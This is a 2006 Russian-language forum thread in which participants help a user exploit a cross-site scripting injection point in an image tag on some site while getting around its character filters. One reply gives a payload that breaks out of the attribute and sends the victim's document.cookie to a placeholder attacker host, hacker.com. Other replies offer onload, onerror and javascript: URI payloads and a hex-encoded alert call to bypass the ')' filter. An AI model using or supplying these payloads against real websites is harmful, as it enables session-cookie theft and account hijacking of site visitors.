xss

xss, <img src="galery/==XSS==">

ZzZzZzZ Guest	#1 Это нравится:0 Да/0 Нет 04.04.2006 23:36:30 Можно ли что-то сделать с багой типа <img src="galery/==XSS=="> Если фильтруются двойные кавычки (") и обратная скобка ")".

Phoenix

Guest

Это нравится:0 Да/0 Нет

05.04.2006 14:47:23

двойная кавычка как имено фильтруется?
заменяется на \" или вырезается...или как?
аналогино как фильтруется скобка?
если фильтруется двойная кавычка таким образом \"
то можно сделать вот что
<img src="galery/\"><script>document.location.href='http://hacker.com/c.php?c='+escape(document.cookie)</script> ">
примерно..

ZzZzZzZ Guest	#3 Это нравится:0 Да/0 Нет 06.04.2006 13:32:29 вырезается

Phoenix Guest	#4 Это нравится:0 Да/0 Нет 06.04.2006 15:01:54 тогда вряли ли что то стоящее удасться провернуть.. так как за пределы строкового параметра ты не вылезешь...

ZzZzZzZ Guest	#5 Это нравится:0 Да/0 Нет 06.04.2006 16:17:25 а можно ли просто сослаться на др сервер? (картинка не с этого сервера)

Shanker мастер Сообщений: 1446 Баллов: 1464 Регистрация: 28.09.2003 всего лишь человек...	#6 Это нравится:0 Да/0 Нет 06.04.2006 21:56:00 Как вариант: <image src=1.png onload=alert('ok')> <image src=javascript:alert('ok')> "Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."

Shanker мастер Сообщений: 1446 Баллов: 1464 Регистрация: 28.09.2003 всего лишь человек...	#7 Это нравится:0 Да/0 Нет 06.04.2006 22:04:01 <image src='' onerror=alert('ok')> "Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."

Shanker

мастер

Сообщений: 1446 Баллов: 1464 Регистрация: 28.09.2003

всего лишь человек...

Это нравится:0 Да/0 Нет

06.04.2006 22:05:55

Цитата
ZzZzZzZ пишет: а можно ли просто сослаться на др сервер? (картинка не с этого сервера)

Сослаться-то можно, вот только если ты в качестве картинки скрипт укажешь - вряд ли он выполнится!

"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."

ZzZzZzZ

Guest

Это нравится:0 Да/0 Нет

06.04.2006 23:19:42

Shanker

Цитата
ZzZzZzZ пишет: обратная скобка ")".

Цитата
Shanker пишет: Сослаться-то можно

напиши плз

ZzZzZzZ

Guest

#10

Это нравится:0 Да/0 Нет

06.04.2006 23:28:28

и ">" тоже режется.

Цитата
Phoenix пишет: двойная кавычка как имено фильтруется? заменяется на " или вырезается...или как?

заменяется на \"

ZzZzZzZ Guest	#11 Это нравится:0 Да/0 Нет 06.04.2006 23:31:52 НЕВОЗМОЖНЫЕ ТЕГИ ")" и ">" ЗАМЕНЯЮЩИЕСЯ ТЕГИ ", '

Shanker

мастер

Сообщений: 1446 Баллов: 1464 Регистрация: 28.09.2003

всего лишь человек...

#12

Это нравится:0 Да/0 Нет

07.04.2006 01:37:31

Цитата
ZzZzZzZ пишет: обратная скобка ")"

alert('ok') шифруем hex'ом:
%61%6C%65%72%74%28%27%6F%6B%27%29

В итоге попробуй: <image src=1.png onload=%61%6C%65%72%74%28%27%6F%6B%27%29>

"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."

Shanker

мастер

Сообщений: 1446 Баллов: 1464 Регистрация: 28.09.2003

всего лишь человек...

#13

Это нравится:0 Да/0 Нет

07.04.2006 01:39:27

Цитата
ZzZzZzZ пишет: <img src="galery/==XSS==">

Как же ты это вводишь если ">" фильтруется? Или ты там с bb-кодом развлекаешься?

"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."

ZzZzZzZ Guest	#14 Это нравится:0 Да/0 Нет 07.04.2006 09:21:41 <img src="galery/==XSS=="> ==XSS== - это то место куда можно вставить код

Shanker

мастер

Сообщений: 1446 Баллов: 1464 Регистрация: 28.09.2003

всего лишь человек...

#15

Это нравится:0 Да/0 Нет

09.04.2006 02:59:48

Цитата
ZzZzZzZ пишет: <img src="galery/==XSS==">

Случаем создаётся не беря переменную строку из url?
Если нет и нельзя вообще убрать galery/ то никак не обойти...

"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."

Читают тему

Логин:
Пароль:
	Запомнить меня на этом компьютере

Забыли свой пароль?